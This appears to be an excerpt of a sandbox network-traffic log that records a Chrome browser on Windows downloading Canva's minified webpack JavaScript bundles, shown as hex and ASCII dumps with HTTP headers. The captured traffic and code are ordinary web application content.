                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 20 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: sTN+f3gVl1YM4SspMURs6x9aJX2yiTaIQyYBjnlvpBaSHu2nz8EA9Z6zwaj2MTA/SfIBnSaEm7s=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: XWYPJ858SAFFKEWQ
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: AfvhL9R7ManxqkdDCdw7qNuRX6MhA4Xa
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC356INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 46 57 49 6a 39 69 6f 7a 4a 65 45 55 43 34 65 5a 48 25 32 42 48 63 6f 71 6b 68 74 50 72 61 4f 6e 4c 72 68 30 72 76 38 36 48 37 37 4d 48 78 33 69 6e 77 74 44 47 66 38 75 25 32 46 4c 67 79 53 79 65 70 68 25 32 42 48 6a 34 57 25 32 42 5a 35 68 6c 71 43 64 55 5a 4c 54 32 6e 52 35 35 67 53 6c 54 25 32 46 41 55 43 78 38 4b 4c 79 66 62 30 54 66 73 4d 65 31 52 5a 50 58 72 45 4d 39 51 76 75 61 34 67 54 66 6b 41 62 33 25 32 42 43 65 4d 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FWIj9iozJeEUC4eZH%2BHcoqkhtPraOnLrh0rv86H77MHx3inwtDGf8u%2FLgySyeph%2BHj4W%2BZ5hlqCdUZLT2nR55gSlT%2FAUCx8KLyfb0TfsMe1RZPXrEM9Qvua4gTfkAb3%2BCeM%3D"}],"group":"cf-nel","max_age":
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1192INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 33 34 39 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 35 37 37 30 33 33 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 73 65 6c 66 2e 5f 66
                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[3349],{/***/ 577033:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._f
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 62 2c 63 29 3d 3e 7b 63 6f 6e 73 74 20 64 3d 4f 59 28 22 69 64 62 5f 74 72 61 6e 73 61 63 74 69 6f 6e 20 65 72 72 6f 72 22 29 3b 61 2e 75 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6f 6d 70 6c 65 74 65 22 2c 28 29 3d 3e 62 28 29 29 3b 61 2e 75 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 65 72 72 6f 72 22 2c 66 3d 3e 7b 66 3d 66 2e 74 61 72 67 65 74 3b 63 28 64 28 28 6e 75 6c 6c 3d 3d 3d 66 7c 7c 76 6f 69 64 20 30 3d 3d 3d 66 3f 76 6f 69 64 20 30 3a 66 2e 65 72 72 6f 72 29 7c 7c 61 2e 75 74 2e 65 72 72 6f 72 7c 7c 45 72 72 6f 72 28 22 55 6e 6b 6e 6f 77 6e 20 65 72 72 6f 72 22 29 29 29 7d 29 3b 63 6f 6e 73 74 20 65 3d 6e 65 77 20 74 38 61 3b 61 2e 75 74
                                                                                                                                                                                                                                                    Data Ascii: a){return new Promise((b,c)=>{const d=OY("idb_transaction error");a.ut.addEventListener("complete",()=>b());a.ut.addEventListener("error",f=>{f=f.target;c(d((null===f||void 0===f?void 0:f.error)||a.ut.error||Error("Unknown error")))});const e=new t8a;a.ut
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 63 61 73 65 20 22 6f 6b 22 3a 72 65 74 75 72 6e 20 31 3b 63 61 73 65 20 22 65 72 72 6f 72 22 3a 72 65 74 75 72 6e 20 32 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 20 30 7d 7d 3b 41 38 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 3d 5b 5d 3b 66 6f 72 28 63 6f 6e 73 74 20 5b 63 2c 64 5d 6f 66 20 61 2e 65 6e 74 72 69 65 73 28 29 29 6e 75 6c 6c 21 3d 64 26 26 62 2e 70 75 73 68 28 7b 6b 65 79 3a 63 2c 76 61 6c 75 65 3a 54 59 28 64 29 7d 29 3b 72 65 74 75 72 6e 20 62 7d 3b 0a 54 59 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 3d 74 79 70 65 6f 66 20 61 3b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 3d 62 3f 7b 73 74 72 69 6e 67 56 61 6c 75 65 3a 61 7d 3a 22 6e 75 6d 62 65 72 22 3d 3d 3d 62 3f 4e 75 6d 62 65 72 2e 69 73 49
                                                                                                                                                                                                                                                    Data Ascii: case "ok":return 1;case "error":return 2;default:return 0}};A8a=function(a){const b=[];for(const [c,d]of a.entries())null!=d&&b.push({key:c,value:TY(d)});return b};TY=function(a){const b=typeof a;return"string"===b?{stringValue:a}:"number"===b?Number.isI
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 74 72 61 63 65 49 64 3a 75 2e 66 4b 2e 74 72 61 63 65 49 64 2c 64 72 6f 70 70 65 64 41 74 74 72 69 62 75 74 65 73 43 6f 75 6e 74 3a 30 7d 29 3b 72 65 74 75 72 6e 7b 74 72 61 63 65 49 64 3a 6c 2c 73 70 61 6e 49 64 3a 68 2c 70 61 72 65 6e 74 53 70 61 6e 49 64 3a 70 2c 6e 61 6d 65 3a 71 2c 6b 69 6e 64 3a 33 2c 73 74 61 72 74 54 69 6d 65 55 6e 69 78 4e 61 6e 6f 3a 6b 2c 65 6e 64 54 69 6d 65 55 6e 69 78 4e 61 6e 6f 3a 6d 2c 61 74 74 72 69 62 75 74 65 73 3a 6e 2c 64 72 6f 70 70 65 64 41 74 74 72 69 62 75 74 65 73 43 6f 75 6e 74 3a 30 2c 65 76 65 6e 74 73 3a 5b 5d 2c 64 72 6f 70 70 65 64 45 76 65 6e 74 73 43 6f 75 6e 74 3a 30 2c 73 74 61 74 75 73 3a 72 2c 6c 69 6e 6b 73 3a 74 2c 64 72 6f 70 70 65 64 4c 69 6e 6b 73 43 6f 75 6e 74 3a 30 7d 7d 29 7d 5d 3b 63 2e 70
                                                                                                                                                                                                                                                    Data Ascii: traceId:u.fK.traceId,droppedAttributesCount:0});return{traceId:l,spanId:h,parentSpanId:p,name:q,kind:3,startTimeUnixNano:k,endTimeUnixNano:m,attributes:n,droppedAttributesCount:0,events:[],droppedEventsCount:0,status:r,links:t,droppedLinksCount:0}})}];c.p
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 44 32 26 26 46 38 61 2e 73 68 61 6c 6c 6f 77 28 66 2e 48 30 2c 67 2e 48 30 29 7d 29 7d 3b 47 38 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 73 77 69 74 63 68 28 61 2e 74 79 70 65 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 61 2e 76 61 6c 75 65 2e 63 6f 6c 75 6d 6e 3b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20 61 2e 76 61 6c 75 65 3b 63 61 73 65 20 32 3a 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 42 28 61 29 3b 7d 7d 3b 5f 5f 63 2e 49 38 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 3f 21 30 3a 6e 75 6c 6c 3d 3d 61 7c 7c 6e 75 6c 6c 3d 3d 62 7c 7c 61 2e 73 68 65 65 74 21 3d 3d 62 2e 73 68 65 65 74 3f 21 31 3a 61 2e 72 61 6e 67 65 3d 3d 3d 62 2e 72 61 6e 67 65 3f 21 30 3a 6e 75 6c 6c 3d 3d
                                                                                                                                                                                                                                                    Data Ascii: D2&&F8a.shallow(f.H0,g.H0)})};G8a=function(a){switch(a.type){case 0:return a.value.column;case 1:return a.value;case 2:break;default:throw new B(a);}};__c.I8a=function(a,b){return a===b?!0:null==a||null==b||a.sheet!==b.sheet?!1:a.range===b.range?!0:null==
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 69 6c 28 6c 2e 61 63 74 75 61 6c 42 6f 75 6e 64 69 6e 67 42 6f 78 44 65 73 63 65 6e 74 2b 0a 31 29 2c 70 3d 4d 61 74 68 2e 63 65 69 6c 28 6c 2e 61 63 74 75 61 6c 42 6f 75 6e 64 69 6e 67 42 6f 78 4c 65 66 74 29 2c 71 3d 4d 61 74 68 2e 63 65 69 6c 28 6c 2e 61 63 74 75 61 6c 42 6f 75 6e 64 69 6e 67 42 6f 78 52 69 67 68 74 29 3b 72 65 74 75 72 6e 7b 61 63 74 75 61 6c 42 6f 75 6e 64 69 6e 67 42 6f 78 41 73 63 65 6e 74 3a 6d 2c 61 63 74 75 61 6c 42 6f 75 6e 64 69 6e 67 42 6f 78 44 65 73 63 65 6e 74 3a 6e 2c 61 63 74 75 61 6c 42 6f 75 6e 64 69 6e 67 42 6f 78 4c 65 66 74 3a 70 2c 61 63 74 75 61 6c 42 6f 75 6e 64 69 6e 67 42 6f 78 52 69 67 68 74 3a 71 2c 66 6f 6e 74 42 6f 75 6e 64 69 6e 67 42 6f 78 41 73 63 65 6e 74 3a 6c 2e 66 6f 6e 74 42 6f 75 6e 64 69 6e 67 42
                                                                                                                                                                                                                                                    Data Ascii: il(l.actualBoundingBoxDescent+1),p=Math.ceil(l.actualBoundingBoxLeft),q=Math.ceil(l.actualBoundingBoxRight);return{actualBoundingBoxAscent:m,actualBoundingBoxDescent:n,actualBoundingBoxLeft:p,actualBoundingBoxRight:q,fontBoundingBoxAscent:l.fontBoundingB
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 3b 4e 38 61 28 6c 2c 28 29 3d 3e 7b 24 59 2e 64 65 6c 65 74 65 28 6b 29 7d 29 3b 72 65 74 75 72 6e 7b 61 61 61 3a 6c 2e 67 65 74 28 29 2c 78 6c 3a 68 7d 7d 3b 0a 4d 38 61 3d 66 75 6e 63 74 69 6f 6e 28 7b 66 6f 6e 74 53 69 7a 65 3a 61 2c 66 6f 6e 74 46 61 6d 69 6c 79 3a 62 2c 74 65 78 74 41 6c 69 67 6e 3a 63 2c 74 65 78 74 42 61 73 65 6c 69 6e 65 3a 64 2c 66 6f 6e 74 57 65 69 67 68 74 3a 65 7d 29 7b 76 61 72 20 66 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 3b 66 3d 41 28 66 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 29 2c 22 63 6f 75 6c 64 20 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 20 6d 65 61 73 75 72 69 6e 67 20 63 61 6e 76 61 73 20 63 6f 6e 74 65 78 74 22 29 3b 66 2e 66 6f 6e 74 3d 60 24 7b
                                                                                                                                                                                                                                                    Data Ascii: ;N8a(l,()=>{$Y.delete(k)});return{aaa:l.get(),xl:h}};M8a=function({fontSize:a,fontFamily:b,textAlign:c,textBaseline:d,fontWeight:e}){var f=document.createElement("canvas");f=A(f.getContext("2d"),"could not initialize measuring canvas context");f.font=`${
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 3b 5f 5f 63 2e 52 38 61 3d 51 38 61 2e 6a 73 78 73 3b 76 61 72 20 53 38 61 3b 53 38 61 3d 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 38 37 35 36 30 34 29 3b 5f 5f 63 2e 54 38 61 3d 53 38 61 2e 43 6f 6d 70 6f 6e 65 6e 74 3b 5f 5f 63 2e 55 38 61 3d 53 38 61 2e 6d 65 6d 6f 3b 76 61 72 20 71 38 61 3d 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 45 72 72 6f 72 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 73 75 70 65 72 28 22 51 75 6f 74 61 20 65 78 63 65 65 64 65 64 22 29 3b 74 68 69 73 2e 63 61 75 73 65 3d 61 7d 7d 2c 52 59 3d 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 45 72 72 6f 72 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 73 75 70 65 72 28 22 49 6e 64 65 78 65 64 20 64 62 20 75 6e 61 76 61 69 6c 61 62 6c 65 22 29 3b 74 68 69 73 2e 63
                                                                                                                                                                                                                                                    Data Ascii: ;__c.R8a=Q8a.jsxs;var S8a;S8a=__webpack_require__(875604);__c.T8a=S8a.Component;__c.U8a=S8a.memo;var q8a=class extends Error{constructor(a){super("Quota exceeded");this.cause=a}},RY=class extends Error{constructor(a){super("Indexed db unavailable");this.c
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 20 59 38 61 3d 63 6c 61 73 73 7b 69 6e 64 65 78 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 58 38 61 28 74 68 69 73 2e 73 74 6f 72 65 2e 69 6e 64 65 78 28 61 29 29 7d 61 73 79 6e 63 20 70 75 74 28 61 2c 62 29 7b 61 3d 74 68 69 73 2e 73 74 6f 72 65 2e 70 75 74 28 61 2c 62 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6b 69 28 61 29 7d 61 73 79 6e 63 20 67 65 74 28 61 29 7b 61 3d 74 68 69 73 2e 73 74 6f 72 65 2e 67 65 74 28 61 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6b 69 28 61 29 7d 61 73 79 6e 63 20 64 65 6c 65 74 65 28 61 29 7b 61 3d 74 68 69 73 2e 73 74 6f 72 65 2e 64 65 6c 65 74 65 28 61 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6b 69 28 61 29 7d 61 73 79 6e 63 20 63 6c 65 61 72 28 29 7b 63 6f 6e 73 74 20 61 3d 74 68 69 73 2e 73 74 6f 72 65 2e 63 6c 65
                                                                                                                                                                                                                                                    Data Ascii: Y8a=class{index(a){return new X8a(this.store.index(a))}async put(a,b){a=this.store.put(a,b);return this.ki(a)}async get(a){a=this.store.get(a);return this.ki(a)}async delete(a){a=this.store.delete(a);return this.ki(a)}async clear(){const a=this.store.cle


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    24192.168.2.449766104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC787OUTGET /web/0cda863f2baa0d46.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:27 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 17275
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a0e4b634204-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 71056
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "d413ebca508b7b61807ee983a30203d3"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:13 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 01:30:32 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 20 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: JtYo5Rba1A0391rGziyaguY5mImzf+SDGi7OL9zEa3fpHn08Cp68xzcRwnYMWVu7R5vWKbEuL9o=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: XWYH8VN48G3M95DX
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: kSK3EsqBOvtxco.0d0uCns7Fv7vWKIHu
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC350INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 31 33 32 48 73 56 65 37 51 67 69 68 67 4c 4c 54 6a 64 67 41 34 77 6e 73 63 76 56 59 33 56 4a 71 68 46 77 6f 35 58 6d 43 6a 62 65 70 57 44 38 70 50 6b 69 6f 6c 56 74 33 66 4d 57 73 33 4a 77 6f 71 45 30 6f 66 69 77 70 63 72 4d 47 4b 66 25 32 46 4a 6b 72 39 65 34 78 49 6e 71 49 30 71 62 75 30 30 67 78 33 56 6b 52 78 57 71 44 72 25 32 42 64 51 47 6a 56 4c 67 4c 30 25 32 42 4b 36 76 6a 45 31 41 51 48 43 42 32 49 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=132HsVe7QgihgLLTjdgA4wnscvVY3VJqhFwo5XmCjbepWD8pPkiolVt3fMWs3JwoqE0ofiwpcrMGKf%2FJkr9e4xInqI0qbu00gx3VkRxWqDr%2BdQGjVLgL0%2BK6vjE1AQHCB2I%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1198INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 33 39 35 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 32 38 34 34 35 37 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 5f 5f 77 65 62 5f 72
                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[2395],{/***/ 284457:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_r
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 63 72 6f 73 73 5f 64 6f 6d 61 69 6e 3a 21 30 2c 73 68 6f 77 5f 6c 6f 67 3a 61 2e 5a 45 61 2c 73 65 6e 64 5f 74 79 70 65 3a 64 3f 22 62 65 61 63 6f 6e 22 3a 22 61 6a 61 78 22 2c 70 72 65 73 65 74 5f 70 72 6f 70 65 72 74 69 65 73 3a 7b 6c 61 74 65 73 74 5f 72 65 66 65 72 72 65 72 5f 68 6f 73 74 3a 21 30 2c 75 72 6c 3a 21 31 7d 7d 7d 3b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6d 65 28 37 31 36 32 37 30 29 2e 74 68 65 6e 28 28 29 3d 3e 7b 65 28 5f 5f 63 2e 41 28 61 2e 67 6c 6f 62 61 6c 2e 73 61 29 29 7d 29 2e 63 61 74 63 68 28 28 29 3d 3e 7b 65 28 76 6f 69 64 20 30 29 7d 29 7d 29 3b 61 2e 48 39 2e 74 68 65 6e 28 65 3d 3e 7b 76 61 72 20 66 3b 6e 75 6c 6c 3d 3d 3d 65 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d
                                                                                                                                                                                                                                                    Data Ascii: cross_domain:!0,show_log:a.ZEa,send_type:d?"beacon":"ajax",preset_properties:{latest_referrer_host:!0,url:!1}}};__webpack_require__.me(716270).then(()=>{e(__c.A(a.global.sa))}).catch(()=>{e(void 0)})});a.H9.then(e=>{var f;null===e||void 0===e?void 0:null=
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 22 61 6e 61 6c 79 74 69 63 73 5f 65 76 65 6e 74 5f 76 32 22 5d 2c 22 72 65 61 64 77 72 69 74 65 22 29 3b 63 6f 6e 73 74 20 63 3d 61 2e 6f 62 6a 65 63 74 53 74 6f 72 65 28 22 61 6e 61 6c 79 74 69 63 73 5f 65 76 65 6e 74 5f 76 32 22 29 2c 64 3d 5b 63 2e 69 6e 64 65 78 28 22 75 73 65 72 5f 69 64 5f 69 6e 64 65 78 22 29 2e 67 65 74 41 6c 6c 28 6e 75 6c 6c 21 3d 3d 62 26 26 76 6f 69 64 20 30 21 3d 3d 62 3f 62 3a 22 6e 75 6c 6c 22 29 5d 3b 62 26 26 64 2e 70 75 73 68 28 63 2e 69 6e 64 65 78 28 22 75 73 65 72 5f 69 64 5f 69 6e 64 65 78 22 29 2e 67 65 74 41 6c 6c 28 22 6e 75 6c 6c 22 29 29 3b 62 3d 28 62 3d 28 61 77 61 69 74 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 64 29 29 2e 66 6c 61 74 28 29 29 3f 62 2e 6d 61 70 28 65 3d 3e 78 31 2e 52 61 28 65 2e 65 76 65 6e 74
                                                                                                                                                                                                                                                    Data Ascii: "analytics_event_v2"],"readwrite");const c=a.objectStore("analytics_event_v2"),d=[c.index("user_id_index").getAll(null!==b&&void 0!==b?b:"null")];b&&d.push(c.index("user_id_index").getAll("null"));b=(b=(await Promise.all(d)).flat())?b.map(e=>x1.Ra(e.event
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 2e 72 61 6e 64 6f 6d 28 29 29 3b 61 77 61 69 74 20 5f 5f 63 2e 4f 72 28 28 29 3d 3e 62 28 66 2c 65 29 2c 35 45 33 29 2e 72 65 73 75 6c 74 3b 5f 5f 63 2e 4f 72 28 61 73 79 6e 63 28 29 3d 3e 7b 61 77 61 69 74 20 63 2e 70 75 74 28 65 2c 7b 58 37 3a 66 2c 52 33 3a 44 61 74 65 2e 6e 6f 77 28 29 2b 0a 31 31 45 33 7d 29 7d 2c 31 45 33 29 7d 7d 2c 51 64 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 6e 61 76 69 67 61 74 6f 72 2e 6c 6f 63 6b 73 2c 62 3d 4e 64 62 3b 72 65 74 75 72 6e 20 63 3d 3e 6e 65 77 20 50 72 6f 6d 69 73 65 28 64 3d 3e 7b 61 2e 72 65 71 75 65 73 74 28 62 28 63 29 2c 28 29 3d 3e 7b 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 29 3d 3e 7b 7d 29 7d 29 7d 29 7d 2c 52 64 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b
                                                                                                                                                                                                                                                    Data Ascii: .random());await __c.Or(()=>b(f,e),5E3).result;__c.Or(async()=>{await c.put(e,{X7:f,R3:Date.now()+11E3})},1E3)}},Qdb=function(){var a=navigator.locks,b=Ndb;return c=>new Promise(d=>{a.request(b(c),()=>{d();return new Promise(()=>{})})})},Rdb=function(a){
